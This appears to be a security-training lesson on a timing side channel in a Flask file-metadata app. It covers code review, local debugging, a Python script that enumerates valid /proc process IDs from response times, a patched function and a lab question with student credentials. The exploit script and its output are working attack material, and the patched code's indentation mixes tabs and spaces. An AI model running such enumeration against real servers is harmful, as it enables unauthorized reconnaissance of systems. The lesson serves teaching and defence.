Whitebox Attacks

Data Exfiltration via Response Timing

Even if a web application does not explicitly display the result of an operation, the response time can still leak information about the outcome of that operation. In this section, we will discuss how to exploit differences in response timing to infer information about the web application that may help us in further attack vectors.

Code Review - Identifying the Vulnerability

For this section, the client implemented a web application that provides information about the web server's local filesystem. Each system user receives credentials for the web application and can check meta-information about files owned by them. The root user is allowed to check information for all system files. For the engagement, the client provided us with credentials for the htb-stdnt user and the source code.

Before jumping into the code analysis, let us quickly look at the web application to get a feel for the application's functionality. After logging in, we can access the /filecheck route to check information about system files. Let us request a file path that we know is owned by our user htb-stdnt, for instance, our home directory at /home/htb-stdnt/:

On the other hand, if we request a path that we know is owned by another user, for instance, /root/, the web application displays an error:

Now that we have an overview of the web application's core functionality let us look at the source code. Since the web application's primary purpose is to display meta information about system files, let us focus our code analysis on this functionality which is implemented in the get_file_details function and used in the /filecheck route:

# return fileowner, filesize (recursively), and number of subfiles (recursively)
def get_file_details(path):
    try:
        if not os.path.exists(path):
            return '', 0, 0

        # number of subfiles
        filecount = 0
        for root_dir, cur_dir, files in os.walk(path):
            filecount += len(files)

        # file size
        path = Path(path)
        filesize = sum(f.stat().st_size for f in path.glob('**/*') if f.is_file())

        # file owner
        owner = path.owner()

        return owner, filesize, filecount

    except:
        return '', 0, 0

<SNIP>

@app.route('/filecheck', methods=['GET'])
def filecheck():
    if not session.get('logged_in'):
        return redirect(url_for('index'))

    user = session.get('user')
    filepath = request.args.get('filepath')

    owner, filesize, filecount = get_file_details(filepath)

    if (user == 'root') or (user == owner):
        return render_template('filecheck.html', message="Success!", type="success", file=filepath, owner=owner, filesize=filesize, filecount=filecount)

    return render_template('filecheck.html', message="Access denied!", type="danger", file=filepath)

The function get_file_details returns early if the path provided does not exist on the filesystem. Otherwise, it calculates the number of subfiles if the provided path is a directory by recursively getting the number of files in each subfolder using the os.walk function. Additionally, it recursively computes the size of the file and all subfiles in case the path is a directory. Lastly, it returns the owner of the provided filepath as well.

Looking at the route for /filecheck, we can see that we can provide the input to the get_file_details function with the filepath GET parameter. However, the web application only displays the meta information if we are logged in as the owner of the provided file or if we are the root user. This means our account htb-stdnt can only query meta information for files owned by the system user htb-stdnt. There is no way to exfiltrate meta-information about files we cannot access.

However, the check whether we own the file or directory specified in the filepath GET variable is implemented after the meta-information has already been collected by the get_file_details function. Since checking all subdirectories and subfiles recursively takes processing time, this potentially leaks whether the path provided in filepath is valid on the web server's filesystem, leading to information disclosure via response timing.

Debugging the Application Locally

Let us test our assumption on a local version of the web application such that we can debug and fine-tune our exploit. We can run the web application locally using the same methodology from the previous section. Keep in mind that we need to run the web application as root if we want to test files our system user cannot access.

To simplify the testing process, let us adjust the /filecheck endpoint by removing the need for authentication and fixing the user variable to any system user. This way, we do not have to deal with authentication or any database operations:

@app.route('/filecheck', methods=['GET'])
def filecheck():
    user = 'vautia'
    filepath = request.args.get('filepath')

    owner, filesize, filecount = get_file_details(filepath)

    if (user == 'root') or user == owner:
        return render_template('filecheck.html', message="Success!", type="success", file=filepath, owner=owner, filesize=filesize, filecount=filecount)

    return render_template('filecheck.html', message="Access denied!", type="danger", file=filepath)

Due to our changes, we can now access the /filecheck endpoint directly without any authentication:

GET /filecheck?filepath=/home/vautia/ HTTP/1.1
Host: 127.0.0.1:1337

As an example, let us request a filepath that we know exists and is owned by our user, for instance, our home folder, and keep an eye on the response time:

Next, let us request a filepath that exists but is not owned by our user, like /proc/:

In the bottom right corner, we can see the response time of more than 4s. If we request a filepath we know to be invalid, like /invalid/, the response time is much shorter:

That is because the get_file_details function exits early if the filepath is invalid. This gives us a way of leaking valid paths on the web server. Keep in mind that the function takes longer because it recursively steps through each subdirectory to determine file sizes and the number of files. If we request a single file that is valid, like /etc/passwd, the timing difference is similar to an invalid file path because there are no subdirectories to check:

Thus, there is no way for us to identify valid files on the filesystem with this method. This also means that we can only reliably determine that directories are valid if they contain sufficient subdirectories and subfiles that the get_file_details function needs to step through such that the processing time is sufficiently high for us to notice the difference in response time.

Exploitation

Now that we understand the timing attack we can run against the web application, let us discuss interesting ways we can use the attack for. In Linux, each process has a unique directory in /proc/<pid>, where the pid is the process ID of the corresponding process. Since the timing attack allows us to determine if a directory exists on the filesystem, this gives us a way of determining valid process IDs. For instance, a valid process ID results in a higher response time than our baseline response time for invalid directories:

For an information disclosure of valid process IDs on a bigger scale, let us modify our exploit script from the previous section:

import requests

URL = "http://172.17.0.2:1337/filecheck"
cookies = {"session": "eyJsb2dnZWRfaW4iOnRydWUsInVzZXIiOiJodGItc3RkbnQifQ.ZCh4Qw.Lv94ak_WPWEN8Idhwf7l-3a5MH4"}
THRESHOLD_S = 0.003

for pid in range(0, 200):
    r = requests.get(URL, params={"filepath": f"/proc/{pid}/"}, cookies=cookies)

    if r.elapsed.total_seconds() > THRESHOLD_S:
        print(f"Valid PID found: {pid}")

Running the exploit script leaks valid process IDs:

[!bash!]$ python3 solver.py

Valid PID found: 1
Valid PID found: 158

Remember that this attack's reliability depends on the processing time the web application takes to compute the meta information for the directory. Since the process directories generally do not contain many subdirectories, we must carefully fine-tune our threshold. We can use known valid and known invalid values for this fine-tuning process. Furthermore, the exploit is not entirely reliable, particularly if run over the public internet. Thus, we may need to run the exploit multiple times and eliminate false positives by checking which results come up in multiple runs and which are false positives.

Another way we could exploit the vulnerability is by enumerating valid system users by enumerating existing home folders in /home/. Since users may keep additional data in their home directories, the exploit becomes more reliable.

Prevention & Patching

Generally, preventing timing vulnerabilities is not easy since we must consider differences in processing time and what kind of information these differences might reveal to an attacker. In our case, we must implement the permission check before the computation of file meta-information. Thus, the function can return early if the user has insufficient permissions, and the web server can send an early response. Thus, there is no significant timing difference if the user provided a valid or invalid path.

We could implement this by adding a user argument to the get_file_details function and returning early in case of insufficient permissions:

# return fileowner, filesize (recursively), and number of subfiles (recursively)
def get_file_details(path, user):
    try:
        if not os.path.exists(path):
            return '', 0, 0

		# permission check
		path = Path(path)
		owner = path.owner()
		if (user != 'root') and (user != owner):
			return '', 0, 0

        # number of subfiles
        filecount = 0
        for root_dir, cur_dir, files in os.walk(path):
            filecount += len(files)

        # file size
        filesize = sum(f.stat().st_size for f in path.glob('**/*') if f.is_file())

        return owner, filesize, filecount

    except:
        return '', 0, 0

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

Authenticate to with user "htb-stdnt" and password "Academy_student!"

+ 5 Try to use what you learned in this section to enumerate a valid system username.

+10 Streak pts

code_timing_data.zip

Previous Next

Go to Questions

Introduction to Whitebox Attacks

Skills Assessment

My Workstation

OFFLINE